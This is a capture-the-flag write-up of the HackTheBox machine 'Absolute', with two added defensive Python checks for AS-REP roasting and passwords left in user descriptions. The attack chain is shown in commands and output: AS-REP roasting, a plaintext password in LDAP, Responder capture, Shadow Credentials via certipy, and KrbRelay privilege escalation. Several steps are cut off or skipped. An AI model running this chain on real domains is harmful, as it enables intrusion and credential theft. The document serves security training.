Absolute is an Insane Windows machine from HackTheBox created by Geiseric. This machine starts off with discovering usernames in the Author field of the metadata of images on the website. Making a wordlist out of these and using kerbrute reveals valid usernames. I'll AS-REP roast these users to get one hit, and the hash from the AS-REP roast cracks. Every user is in the Protected Users group, so we have to get a TGT for each user and go through Kerberos with every tool. After some LDAP enumeration I find another user's password set in their description. Using that user I can grab an exe file which attempts to authenticate to LDAP at dc.absolute.htb, so I point that FQDN to my attacker machine and capture the creds via Responder. This user has permission to grant himself GenericAll on a group that has GenericWrite over a user that can WinRM, so I abuse this via bloodyAD and certipy-ad to get the NT hash of winrm_user, then I WinRM in to obtain the user flag. For root, some basic enumeration fails, so instead we have to run KrbRelay.exe with RunasCs.exe to obtain an interactive session, and using a custom port with the right CLSID I can add myself to the local Administrators group to read the root flag.
Nmap Scan
I'll start by running nmap on all open TCP ports:
```
~/htb/Absolute/enumeration ❯ nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.10.11.181
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-14 02:12 EDT
Nmap scan report for DC.absolute.htb (10.10.11.181)
Host is up (0.10s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-14 06:12:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute
| Not valid before: 2025-04-23T18:13:50
|_Not valid after:  2026-04-23T18:13:50
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute
| Not valid before: 2025-04-23T18:13:50
|_Not valid after:  2026-04-23T18:13:50
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute
| Not valid before: 2025-04-23T18:13:50
|_Not valid after:  2026-04-23T18:13:50
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute
| Not valid before: 2025-04-23T18:13:50
|_Not valid after:  2026-04-23T18:13:50
|_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.29 seconds
```
As you can see, this is a DC for the domain absolute.htb with the FQDN dc.absolute.htb. There is also a website, which is unusual for a DC, so I'll check that out first.
Recon
445/tcp - SMB
I'll test for Guest authentication using nxc:
```
~/htb/Absolute/enumeration ❯ nxc smb dc.absolute.htb -u Guest -p '' --shares
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [-] absolute.htb\Guest: STATUS_ACCOUNT_DISABLED
```
Guest auth is disabled, so I'll move on to HTTP instead.
80/tcp - HTTP
The site looks like a generic HTTP template running on IIS/10.0. I'll download the hero images it serves and look at their metadata:
```
~/htb/Absolute/enumeration/pictures ❯ ls
hero_1.jpg  hero_2.jpg  hero_3.jpg  hero_4.jpg  hero_5.jpg  hero_6.jpg
```
Now, with this one-liner, I can get all of the authors:
```
~/htb/Absolute/enumeration/pictures ❯ exiftool * | grep Author | awk -F ': ' '{print $2}'
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith
```
Real authors in image metadata typically don't look like this. It can happen, but I usually see a company name or something similar, so this is interesting. The whole goal here is to get valid usernames in AD, and a very common naming convention for usernames in AD is:
```
john doe = j.doe
```
First letter of the first name, then the full last name, separated by a period. We could try all naming conventions with username-anarchy, but when I did this machine I went straight for the most common one and built a wordlist in that format. Running GetNPUsers.py against the valid usernames:
```
/usr/local/bin/GetNPUsers.py:150: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User J.ROBERTS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.ROBINSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User L.MOORE doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.SMITH doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User S.JOHNSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.CHAFFREY doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$D.KLAY@ABSOLUTE.HTB:c253d756ee3ef5e6041ea0f7a534e308$21bbfb32228080fff5874e727e2f1ec433ada497f81764a4e810f0a4c2d0a85318ef7057c6f02a8620f9571a9b2d23189f47fadc85f76dd22593a36ea020e39ab50702e6aec5c62a47e39f7a3c15f2ace1d3bdfb35e610892a2a2cdc3863e9ebe5c3c7fcea3d1d6564c2a311b3fe9247a4ede126b4830974137171ca4ae30e4e675af9672f14eb46bb6fd2ed0c42f0559fcbbc5ce36f2daf80c23d0230d2ab82dc5ee9c8cd5788b266869c1c7a8c2ff1ee5b1696c36bcec0550b5a91bb9788be864aeeb4643939f15b8de9033b8fb93628b12cc9b2f9cdb80edba3ef2a761452cf8083589762289a5b356647
[-] User S.OSVALD doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User winrm_user doesn't have UF_DONT_REQUIRE_PREAUTH set
```
We got a hit for d.klay. I'll save his hash and crack it via hashcat:
```
~/htb/Absolute/enumeration ❯ hashcat -a 0 d.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
```
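As an added defender's-side example (mine, not part of the writeup), here is Python that flags AS-REP roasting in Windows Security event 4768 data: a TGT issued with Pre-Authentication Type 0 is the signature of a DONT_REQ_PREAUTH account being roasted, and ticket etype 0x17 (RC4, the 23 in the $krb5asrep$23$ header above) is the high-confidence case. The event bodies, account names and client addresses are constructed samples that mirror the box, not real log data.

```python
import re
from dataclasses import dataclass
from typing import Optional


def event_4768(account, client, etype, preauth, result):
    """Build one 4768 body in the tab-separated layout of the Security log (constructed sample)."""
    return (
        "A Kerberos authentication ticket (TGT) was requested.\n"
        f"Account Name:\t\t{account}\n"
        f"Client Address:\t\t{client}\n"
        f"Ticket Encryption Type:\t{etype}\n"
        f"Pre-Authentication Type:\t{preauth}\n"
        f"Result Code:\t\t{result}\n"
    )


# Constructed sample events (addresses are made up):
SAMPLE_4768_EVENTS = [
    event_4768("d.klay", "::ffff:10.10.14.5", "0x17", "0", "0x0"),            # roast: no pre-auth, RC4
    event_4768("d.klay", "::ffff:10.10.14.5", "0x12", "0", "0x0"),            # no pre-auth, AES requested
    event_4768("j.roberts", "::ffff:10.10.11.181", "0x12", "2", "0x0"),       # normal logon, pre-auth type 2
    event_4768("j.roberts", "::ffff:10.10.14.5", "0xFFFFFFFF", "-", "0x18"),  # pre-auth failed, nothing issued
]

# "Key:<whitespace>value" lines; the first line of the body has no colon and is skipped.
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z\- ]+):\s+(?P<val>\S+)\s*$", re.MULTILINE)


@dataclass
class TgtRequest:
    account: str
    client: str
    etype: int
    preauth_type: int  # -1 when the KDC left the field as "-"
    result: int


def _num(value: str, base: int) -> int:
    return int(value, base) if value != "-" else -1


def parse_4768(text: str) -> TgtRequest:
    """Pull the fields the check needs out of one 4768 event body."""
    fields = {m.group("key").strip(): m.group("val") for m in FIELD_RE.finditer(text)}
    return TgtRequest(
        account=fields["Account Name"],
        client=fields["Client Address"],
        etype=_num(fields["Ticket Encryption Type"], 16),
        preauth_type=_num(fields["Pre-Authentication Type"], 10),
        result=_num(fields["Result Code"], 16),
    )


def classify(req: TgtRequest) -> Optional[str]:
    """Severity for a successful TGT issued without pre-authentication; None otherwise."""
    if req.result != 0 or req.preauth_type != 0:
        return None
    # RC4 is what GetNPUsers asks for by default; an AES reply without pre-auth is still worth a look.
    return "high" if req.etype == 0x17 else "medium"


def find_asrep_roasting(events):
    """Return (severity, account, client address) for every event that looks like a roast."""
    hits = []
    for body in events:
        req = parse_4768(body)
        severity = classify(req)
        if severity:
            hits.append((severity, req.account, req.client))
    return hits
```

The same accounts turn up on the directory side as users with the DONT_REQ_PREAUTH flag set, which is the thing to fix; the event check is how you notice someone has already collected the hash.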
With the cracked password I request a TGT for d.klay (every account is in Protected Users, so NTLM auth won't work and Kerberos is needed everywhere), and klist confirms it:

```
Valid starting       Expires              Service principal
06/14/2025 02:27:06  06/14/2025 06:27:06  krbtgt/ABSOLUTE.HTB@ABSOLUTE.HTB
	renew until 06/14/2025 06:27:06
```
Nice, now let's try it:
```
~/htb/Absolute/enumeration ❯ nxc smb DC.absolute.htb -u d.klay -k --use-kcache
SMB         DC.absolute.htb 445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         DC.absolute.htb 445    DC               [+] ABSOLUTE.HTB\d.klay from ccache
```
Boom, that's valid authentication as d.klay. I'll use RustHound with Kerberos authentication because it's seemingly the only ingestor that won't give me trouble:
```
~/htb/Absolute/enumeration ❯ rusthound --zip -d absolute.htb -u 'd.klay' -k --dns-tcp -f DC.absolute.htb
---------------------------------------------------
Initializing RustHound at 02:27:53 on 06/14/25
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2025-06-14T06:27:53Z INFO  rusthound] Verbosity level: Info
[2025-06-14T06:27:54Z INFO  rusthound::ldap] Connected to ABSOLUTE.HTB Active Directory!
[2025-06-14T06:27:54Z INFO  rusthound::ldap] Starting data collection...
[2025-06-14T06:27:55Z INFO  rusthound::ldap] All data collected for NamingContext DC=absolute,DC=htb
[2025-06-14T06:27:55Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2025-06-14T06:27:55Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2025-06-14T06:27:55Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2025-06-14T06:27:55Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] 18 users parsed!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] 63 groups parsed!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] 1 computers parsed!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] 1 ous parsed!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] 1 domains parsed!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] 2 gpos parsed!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] 21 containers parsed!
[2025-06-14T06:27:55Z INFO  rusthound::json::maker] .//20250614022755_absolute-htb_rusthound.zip created!

RustHound Enumeration Completed at 02:27:55 on 06/14/25! Happy Graphing!
```
Auth as svc_smb
Importing this into BloodHound, I can see that my user is in 3 groups, although none of these give my user any group-delegated permissions.
When this happens, I'll usually resort to checking user descriptions via --users in nxc (the columns are username, last password set, bad-password count and description):
```
LDAP  DC.absolute.htb  389  DC  krbtgt      2022-06-09 04:16:38  0  Key Distribution Center Service Account
LDAP  DC.absolute.htb  389  DC  J.Roberts   2022-06-09 04:25:51  1
LDAP  DC.absolute.htb  389  DC  M.Chaffrey  2022-06-09 04:25:51  1
LDAP  DC.absolute.htb  389  DC  D.Klay      2022-06-09 04:25:51  0
LDAP  DC.absolute.htb  389  DC  s.osvald    2022-06-09 04:25:51  1
LDAP  DC.absolute.htb  389  DC  j.robinson  2022-06-09 04:25:51  1
LDAP  DC.absolute.htb  389  DC  n.smith     2022-06-09 04:25:51  1
LDAP  DC.absolute.htb  389  DC  m.lovegod   2022-06-09 04:25:51  0
LDAP  DC.absolute.htb  389  DC  l.moore     2022-06-09 04:25:51  1
LDAP  DC.absolute.htb  389  DC  c.colt      2022-06-09 04:25:51  0
LDAP  DC.absolute.htb  389  DC  s.johnson   2022-06-09 04:25:51  1
LDAP  DC.absolute.htb  389  DC  d.lemm      2022-06-09 04:25:51  0
LDAP  DC.absolute.htb  389  DC  svc_smb     2022-06-09 04:25:51  0  AbsoluteSMBService123!
LDAP  DC.absolute.htb  389  DC  svc_audit   2022-06-09 04:25:51  0
LDAP  DC.absolute.htb  389  DC  winrm_user  2022-06-09 04:25:51  1  Used to perform simple network tasks
```
As you can see, we find what looks like a password for svc_smb:
```
LDAP  DC.absolute.htb  389  DC  svc_smb     2022-06-09 04:25:51  0  AbsoluteSMBService123!
```
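As an added audit example (mine, not from the writeup), the following Python parses rows in the layout nxc prints for --users and flags descriptions that look like they hold a credential, the way svc_smb's does here. The sample rows are constructed from the output above plus one invented d.lemm description to show the keyword case; the description attribute is readable by any authenticated domain user, which is why this is worth running against your own directory export.

```python
import re

# Constructed sample in the nxc `ldap --users` layout:
# proto host port name | username | last password set | bad-pw count | description.
# Rows mirror the writeup; the d.lemm description is invented for the demo.
SAMPLE_NXC_USERS = """\
LDAP DC.absolute.htb 389 DC krbtgt 2022-06-09 04:16:38 0 Key Distribution Center Service Account
LDAP DC.absolute.htb 389 DC J.Roberts 2022-06-09 04:25:51 1
LDAP DC.absolute.htb 389 DC D.Klay 2022-06-09 04:25:51 0
LDAP DC.absolute.htb 389 DC d.lemm 2022-06-09 04:25:51 0 temp pwd Winter2022 until migration
LDAP DC.absolute.htb 389 DC svc_smb 2022-06-09 04:25:51 0 AbsoluteSMBService123!
LDAP DC.absolute.htb 389 DC winrm_user 2022-06-09 04:25:51 1 Used to perform simple network tasks
"""

ROW_RE = re.compile(
    r"^LDAP\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\s+\d+\s*(?P<desc>.*)$"
)
# Words that usually mean the rest of the description is a secret.
KEYWORD_RE = re.compile(r"\b(pass(word)?|pwd|cred(ential)?s?)\b", re.IGNORECASE)


def looks_like_secret(token: str) -> bool:
    """Single token of 8+ chars mixing at least three of: upper, lower, digit, symbol."""
    if len(token) < 8:
        return False
    classes = sum([
        any(c.isupper() for c in token),
        any(c.islower() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ])
    return classes >= 3


def audit_descriptions(output: str):
    """Return (user, description, reason) for every row whose description may hold a credential."""
    findings = []
    for line in output.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # banner lines, blank lines, anything that is not a user row
        user, desc = m.group("user"), m.group("desc").strip()
        if not desc:
            continue
        if KEYWORD_RE.search(desc):
            findings.append((user, desc, "credential keyword"))
        elif any(looks_like_secret(t) for t in desc.split()):
            findings.append((user, desc, "high-entropy token"))
    return findings


if __name__ == "__main__":
    for user, desc, reason in audit_descriptions(SAMPLE_NXC_USERS):
        print(f"{user}: {reason}: {desc}")
```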
Authenticating over SMB as svc_smb, there's a share called Shared with two files:

```
Type help for list of commands
# use Shared
# ls
drw-rw-rw-          0  Thu Sep  1 13:02:23 2022 .
drw-rw-rw-          0  Thu Sep  1 13:02:23 2022 ..
-rw-rw-rw-         72  Thu Sep  1 13:02:23 2022 compiler.sh
-rw-rw-rw-      67584  Thu Sep  1 13:02:23 2022 test.exe
```
The file compiler.sh shows that test.exe was compiled with Nim:
```bash
# cat compiler.sh
#!/bin/bash

nim c -d:mingw --app:gui --cc:gcc -d:danger -d:strip $1
```
I'll grab test.exe and do some basic checks:
```
~/htb/Absolute/enumeration ❯ file test.exe
test.exe: PE32+ executable for MS Windows 5.02 (GUI), x86-64 (stripped to external PDB), 11 sections
~/htb/Absolute/enumeration ❯ strings test.exe | grep -iE "cmd|powershell|http|calc|shellcode"
_acmdln
```
Seems like a normal PE32+ executable. Trying to RE it in dnSpy fails because it can't decompile it (it's a native Nim binary, not .NET). Instead I'll run test.exe in a Windows 10 VM and see what it's doing:
It doesn't output anything, so I'll connect to my VPN on the Windows machine and sniff the traffic on tun0 via Wireshark (you may have to add dc.absolute.htb to your hosts file on Windows):
The tool is trying to authenticate to LDAP as m.lovegod, so I'll point dc.absolute.htb in the hosts file at my Kali machine's IP instead and listen with Responder:
```
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]
```
Looks like we have GenericWrite over winrm_user. The easiest way to abuse this is Shadow Credentials, so I'll do that via Certipy:
```
~/htb/Absolute/enumeration ❯ certipy-ad5 shadow auto -u 'm.lovegod'@absolute.htb -k -account 'winrm_user' -dc-host dc.absolute.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: dc.absolute.htb.
[!] Use -debug to print a stacktrace
[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'd2914f2d-312f-2771-2a41-5a5d8c66243c'
[*] Adding Key Credential with device ID 'd2914f2d-312f-2771-2a41-5a5d8c66243c' to the Key Credentials for 'winrm_user'
[-] Could not update Key Credentials for 'winrm_user' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
```
I got INSUFF_ACCESS_RIGHTS even though I'm in the group that has GenericWrite over winrm_user. I wasn't sure why at the time, but requesting a new TGT for m.lovegod fixes it: the group SIDs in a TGT's PAC are fixed when the ticket is issued, so a ticket requested before the group change doesn't carry the new membership.
```
Password:
[*] Saving ticket in m.lovegod.ccache
~/htb/Absolute/enumeration ❯ export KRB5CCNAME=m.lovegod.ccache
~/htb/Absolute/enumeration ❯ certipy-ad5 shadow auto -u 'm.lovegod'@absolute.htb -k -account 'winrm_user' -dc-host dc.absolute.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: dc.absolute.htb.
[!] Use -debug to print a stacktrace
[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'd0bc1900-8b7d-e2c8-1cca-76a0c14c8c77'
[*] Adding Key Credential with device ID 'd0bc1900-8b7d-e2c8-1cca-76a0c14c8c77' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID 'd0bc1900-8b7d-e2c8-1cca-76a0c14c8c77' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_user@absolute.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_user.ccache'
[*] Wrote credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
```
After some time, I get the NT hash and a TGT for winrm_user! This user can PSRemote to the DC, so I'll set my /etc/krb5.conf to match absolute.htb and connect with Evil-WinRM. Once on the box, whoami /priv shows nothing useful:
```
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
```
*Evil-WinRM* PS C:\Users\winrm_user\Desktop> net user winrm_user
User name                    winrm_user
Full Name
Comment                      Used to perform simple network tasks
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/9/2022 1:25:51 AM
Password expires             Never
Password changeable          6/10/2022 1:25:51 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/13/2025 11:54:33 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Protected Users
The command completed successfully.
```
Nope, just the WinRM group. At this point I was stuck, so I looked at a writeup. Using KrbRelay, we can relay an authentication through a server we control back to the DC and take control of whatever we want. This was patched back in October 2022, but this machine doesn't have that patch yet:
So the prerequisites for this to work are:
Machine doesn't have the October 2022 patches
Machine has LDAP signing disabled
To abuse this I'll drop CheckPort.exe and KrbRelay.exe onto the machine; if you want them precompiled, you can find them in my precompiled tools repo.
```
Info: Uploading /root/htb/Absolute/enumeration/../../../../../opt/tools/CheckPort.exe to C:\programdata\CheckPort.exe

Data: 10240 bytes of 10240 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         7/20/2021  12:21 PM                Microsoft
d-----          9/2/2022   6:38 PM                Package Cache
d-----          9/2/2022   4:39 PM                regid.1991-06.com.microsoft
d-----         9/15/2018  12:19 AM                SoftwareDistribution
d-----          6/7/2022   6:39 AM                ssh
d-----         9/15/2018  12:19 AM                USOPrivate
d-----         7/20/2021  12:22 PM                USOShared
d-----         7/20/2021  12:27 PM                VMware
-a----         6/14/2025  12:07 AM           7680 CheckPort.exe
-a----         6/14/2025  12:06 AM        1618944 KrbRelay.exe
```
Perfect, now I'll run CheckPort.exe to see which port we can run the server on:
```
*Evil-WinRM* PS C:\programdata> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 10
```
Cool, so we'll go through port 10. I'll run KrbRelay.exe supplying the target SPN (ldap), the server port, and the CLSID (you can get the OS version and look through a list of CLSIDs to find one that fits):
```
*Evil-WinRM* PS C:\programdata> .\KrbRelay.exe -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10 -spn ldap/dc.absolute.htb -add-groupmember "Domain Admins" winrm_user
[*] Relaying context: absolute.htb\DC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\programdata\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAitzXQbopayNJsMLufUYqdArAAAHwI///mMpOF+aRvDCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
System.Runtime.InteropServices.COMException (0x8000401A): The server process could not be started because the configured identity is incorrect. Check the username and password. (Exception from HRESULT: 0x8000401A)
   at KrbRelay.Ole32.CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsid, Object pUnkOuter, CLSCTX dwClsCtx, IStorage pstg, UInt32 cmq, MULTI_QI[] rgmqResults)
   at KrbRelay.Program.Main(String[] args)
```
This error occurs because we don't have an interactive session, since we're connected via WinRM. So I'll use RunasCs.exe with a previous user:
```
*Evil-WinRM* PS C:\programdata> .\RunasCs.exe m.lovegod "AbsoluteLDAP2022!" -d absolute.htb '.\KrbRelay.exe -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10 -spn ldap/dc.absolute.htb -add-groupmember "Domain Admins" winrm_user'
[-] RunasCsException: Selected logon type '2' is not granted to the user 'm.lovegod'. Use available logon type '3'.
```
This user doesn't have that logon type granted, so instead I'll use type 9, which is NewCredentials:
```
[*] Relaying context: absolute.htb\DC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\programdata\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAmpkwFn7+icWAb8BYLRND0AgwAAOgQ///89x+X5qWRLCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
```
```
Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
```
```
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_user\Documents> cd ..\..\Administrator
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
```
Absolute was an awesome machine, although the username enumeration through pictures was kinda hard to find considering the website looked like an ordinary template. But the ACL chains and capturing the LDAP credentials were cool, and the KrbRelay attack was really interesting. I'd give this machine a solid 8/10!